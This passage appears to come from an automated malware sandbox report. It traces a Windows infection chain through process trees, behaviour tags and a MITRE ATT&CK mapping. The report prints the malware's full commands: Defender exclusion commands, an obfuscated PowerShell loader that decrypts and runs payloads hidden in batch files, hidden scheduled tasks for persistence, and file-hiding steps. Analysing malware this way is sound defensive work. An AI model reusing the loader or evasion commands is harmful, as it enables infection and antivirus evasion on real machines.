        PID:4728
      - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_924.vbs"
        6⤵
        Checks computer location settings
        
        PID:3132
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_924.bat" "
        7⤵
        
        PID:2936
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8PMom9RnlfWzjG8MC5lXaac8aBGu+w5gW8NmRz9Kk+g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q3K43OSBcYlntcFGSbtNow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YujPS=New-Object System.IO.MemoryStream(,$param_var); $WQOly=New-Object System.IO.MemoryStream; $xgIaW=New-Object System.IO.Compression.GZipStream($YujPS, [IO.Compression.CompressionMode]::Decompress); $xgIaW.CopyTo($WQOly); $xgIaW.Dispose(); $YujPS.Dispose(); $WQOly.Dispose(); $WQOly.ToArray();}function execute_function($param_var,$param2_var){ $zVSXB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RyFSy=$zVSXB.EntryPoint; $RyFSy.Invoke($null, $param2_var);}$tIIDK = 'C:\Users\Admin\AppData\Roaming\startup_str_924.bat';$host.UI.RawUI.WindowTitle = $tIIDK;$KlFzN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tIIDK).Split([Environment]::NewLine);foreach ($XYyBu in $KlFzN) { if ($XYyBu.StartsWith(':: ')) { $JQyvV=$XYyBu.Substring(3); break; }}$payloads_var=[string[]]$JQyvV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2548
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\invoicer.bat'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\invoicer.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3300
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X7Zhl6Khi2ZbZn4/PrAf+8sGbyoXniPMQQRnCuRZwU4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FTiKRMGfSm1nLSyYBeX8aQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWgzw=New-Object System.IO.MemoryStream(,$param_var); $qruKH=New-Object System.IO.MemoryStream; $RPpcy=New-Object System.IO.Compression.GZipStream($VWgzw, [IO.Compression.CompressionMode]::Decompress); $RPpcy.CopyTo($qruKH); $RPpcy.Dispose(); $VWgzw.Dispose(); $qruKH.Dispose(); $qruKH.ToArray();}function execute_function($param_var,$param2_var){ $kflaA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sDziU=$kflaA.EntryPoint; $sDziU.Invoke($null, $param2_var);}$gEOgE = 'C:\Users\Admin\AppData\Local\Temp\invoicer.bat';$host.UI.RawUI.WindowTitle = $gEOgE;$nkdNJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($gEOgE).Split([Environment]::NewLine);foreach ($inqUq in $nkdNJ) { if ($inqUq.StartsWith(':: ')) { $KTGgd=$inqUq.Substring(3); break; }}$payloads_var=[string[]]$KTGgd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      4⤵
      Command and Scripting Interpreter: PowerShell
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:3308
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_906_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_906.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1048
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_906.vbs"
        5⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:432
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_906.bat" "
        6⤵
        
        PID:4056
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:2204
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X7Zhl6Khi2ZbZn4/PrAf+8sGbyoXniPMQQRnCuRZwU4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FTiKRMGfSm1nLSyYBeX8aQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWgzw=New-Object System.IO.MemoryStream(,$param_var); $qruKH=New-Object System.IO.MemoryStream; $RPpcy=New-Object System.IO.Compression.GZipStream($VWgzw, [IO.Compression.CompressionMode]::Decompress); $RPpcy.CopyTo($qruKH); $RPpcy.Dispose(); $VWgzw.Dispose(); $qruKH.Dispose(); $qruKH.ToArray();}function execute_function($param_var,$param2_var){ $kflaA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sDziU=$kflaA.EntryPoint; $sDziU.Invoke($null, $param2_var);}$gEOgE = 'C:\Users\Admin\AppData\Roaming\startup_str_906.bat';$host.UI.RawUI.WindowTitle = $gEOgE;$nkdNJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($gEOgE).Split([Environment]::NewLine);foreach ($inqUq in $nkdNJ) { if ($inqUq.StartsWith(':: ')) { $KTGgd=$inqUq.Substring(3); break; }}$payloads_var=[string[]]$KTGgd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4252
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat" "
    3⤵
    PID:5076
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8PMom9RnlfWzjG8MC5lXaac8aBGu+w5gW8NmRz9Kk+g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q3K43OSBcYlntcFGSbtNow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YujPS=New-Object System.IO.MemoryStream(,$param_var); $WQOly=New-Object System.IO.MemoryStream; $xgIaW=New-Object System.IO.Compression.GZipStream($YujPS, [IO.Compression.CompressionMode]::Decompress); $xgIaW.CopyTo($WQOly); $xgIaW.Dispose(); $YujPS.Dispose(); $WQOly.Dispose(); $WQOly.ToArray();}function execute_function($param_var,$param2_var){ $zVSXB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RyFSy=$zVSXB.EntryPoint; $RyFSy.Invoke($null, $param2_var);}$tIIDK = 'C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat';$host.UI.RawUI.WindowTitle = $tIIDK;$KlFzN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tIIDK).Split([Environment]::NewLine);foreach ($XYyBu in $KlFzN) { if ($XYyBu.StartsWith(':: ')) { $JQyvV=$XYyBu.Substring(3); break; }}$payloads_var=[string[]]$JQyvV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      4⤵
      Command and Scripting Interpreter: PowerShell
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      PID:3136
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_844_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_844.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2968
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_844.vbs"
        5⤵
        Checks computer location settings
        
        PID:5088
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_844.bat" "
        6⤵
        
        PID:2572
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:4768
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8PMom9RnlfWzjG8MC5lXaac8aBGu+w5gW8NmRz9Kk+g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q3K43OSBcYlntcFGSbtNow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YujPS=New-Object System.IO.MemoryStream(,$param_var); $WQOly=New-Object System.IO.MemoryStream; $xgIaW=New-Object System.IO.Compression.GZipStream($YujPS, [IO.Compression.CompressionMode]::Decompress); $xgIaW.CopyTo($WQOly); $xgIaW.Dispose(); $YujPS.Dispose(); $WQOly.Dispose(); $WQOly.ToArray();}function execute_function($param_var,$param2_var){ $zVSXB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RyFSy=$zVSXB.EntryPoint; $RyFSy.Invoke($null, $param2_var);}$tIIDK = 'C:\Users\Admin\AppData\Roaming\startup_str_844.bat';$host.UI.RawUI.WindowTitle = $tIIDK;$KlFzN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tIIDK).Split([Environment]::NewLine);foreach ($XYyBu in $KlFzN) { if ($XYyBu.StartsWith(':: ')) { $JQyvV=$XYyBu.Substring(3); break; }}$payloads_var=[string[]]$JQyvV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        7⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        
        PID:5088
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\invoicer.bat'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\invoicer.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1572
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X7Zhl6Khi2ZbZn4/PrAf+8sGbyoXniPMQQRnCuRZwU4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FTiKRMGfSm1nLSyYBeX8aQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWgzw=New-Object System.IO.MemoryStream(,$param_var); $qruKH=New-Object System.IO.MemoryStream; $RPpcy=New-Object System.IO.Compression.GZipStream($VWgzw, [IO.Compression.CompressionMode]::Decompress); $RPpcy.CopyTo($qruKH); $RPpcy.Dispose(); $VWgzw.Dispose(); $qruKH.Dispose(); $qruKH.ToArray();}function execute_function($param_var,$param2_var){ $kflaA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sDziU=$kflaA.EntryPoint; $sDziU.Invoke($null, $param2_var);}$gEOgE = 'C:\Users\Admin\AppData\Local\Temp\invoicer.bat';$host.UI.RawUI.WindowTitle = $gEOgE;$nkdNJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($gEOgE).Split([Environment]::NewLine);foreach ($inqUq in $nkdNJ) { if ($inqUq.StartsWith(':: ')) { $KTGgd=$inqUq.Substring(3); break; }}$payloads_var=[string[]]$KTGgd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4280
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_560_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_560.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3804
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_560.vbs"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:4768
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_560.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:5096
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X7Zhl6Khi2ZbZn4/PrAf+8sGbyoXniPMQQRnCuRZwU4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FTiKRMGfSm1nLSyYBeX8aQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWgzw=New-Object System.IO.MemoryStream(,$param_var); $qruKH=New-Object System.IO.MemoryStream; $RPpcy=New-Object System.IO.Compression.GZipStream($VWgzw, [IO.Compression.CompressionMode]::Decompress); $RPpcy.CopyTo($qruKH); $RPpcy.Dispose(); $VWgzw.Dispose(); $qruKH.Dispose(); $qruKH.ToArray();}function execute_function($param_var,$param2_var){ $kflaA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sDziU=$kflaA.EntryPoint; $sDziU.Invoke($null, $param2_var);}$gEOgE = 'C:\Users\Admin\AppData\Roaming\startup_str_560.bat';$host.UI.RawUI.WindowTitle = $gEOgE;$nkdNJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($gEOgE).Split([Environment]::NewLine);foreach ($inqUq in $nkdNJ) { if ($inqUq.StartsWith(':: ')) { $KTGgd=$inqUq.Substring(3); break; }}$payloads_var=[string[]]$KTGgd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:4716
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3288
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8PMom9RnlfWzjG8MC5lXaac8aBGu+w5gW8NmRz9Kk+g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q3K43OSBcYlntcFGSbtNow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YujPS=New-Object System.IO.MemoryStream(,$param_var); $WQOly=New-Object System.IO.MemoryStream; $xgIaW=New-Object System.IO.Compression.GZipStream($YujPS, [IO.Compression.CompressionMode]::Decompress); $xgIaW.CopyTo($WQOly); $xgIaW.Dispose(); $YujPS.Dispose(); $WQOly.Dispose(); $WQOly.ToArray();}function execute_function($param_var,$param2_var){ $zVSXB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RyFSy=$zVSXB.EntryPoint; $RyFSy.Invoke($null, $param2_var);}$tIIDK = 'C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat';$host.UI.RawUI.WindowTitle = $tIIDK;$KlFzN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tIIDK).Split([Environment]::NewLine);foreach ($XYyBu in $KlFzN) { if ($XYyBu.StartsWith(':: ')) { $JQyvV=$XYyBu.Substring(3); break; }}$payloads_var=[string[]]$JQyvV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4500
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_80_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_80.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2180
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_80.vbs"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:3336
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_80.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3440
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8PMom9RnlfWzjG8MC5lXaac8aBGu+w5gW8NmRz9Kk+g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q3K43OSBcYlntcFGSbtNow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YujPS=New-Object System.IO.MemoryStream(,$param_var); $WQOly=New-Object System.IO.MemoryStream; $xgIaW=New-Object System.IO.Compression.GZipStream($YujPS, [IO.Compression.CompressionMode]::Decompress); $xgIaW.CopyTo($WQOly); $xgIaW.Dispose(); $YujPS.Dispose(); $WQOly.Dispose(); $WQOly.ToArray();}function execute_function($param_var,$param2_var){ $zVSXB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RyFSy=$zVSXB.EntryPoint; $RyFSy.Invoke($null, $param2_var);}$tIIDK = 'C:\Users\Admin\AppData\Roaming\startup_str_80.bat';$host.UI.RawUI.WindowTitle = $tIIDK;$KlFzN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tIIDK).Split([Environment]::NewLine);foreach ($XYyBu in $KlFzN) { if ($XYyBu.StartsWith(':: ')) { $JQyvV=$XYyBu.Substring(3); break; }}$payloads_var=[string[]]$JQyvV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        6⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        
        PID:740
        
        C:\Windows\System32\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\system"
        7⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:4640
        
        C:\Windows\System32\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\system\system.exe"
        7⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:3804
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp1B92.tmp.bat""
        7⤵
        
        PID:2840
        
        C:\Windows\system32\timeout.exe
        
        timeout 3
        8⤵
        Delays execution with timeout.exe
        
        PID:4472
        
        C:\Users\Admin\system\system.exe
        
        "C:\Users\Admin\system\system.exe"
        8⤵
        Executes dropped EXE
        Modifies system certificate store
        
        PID:1768

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

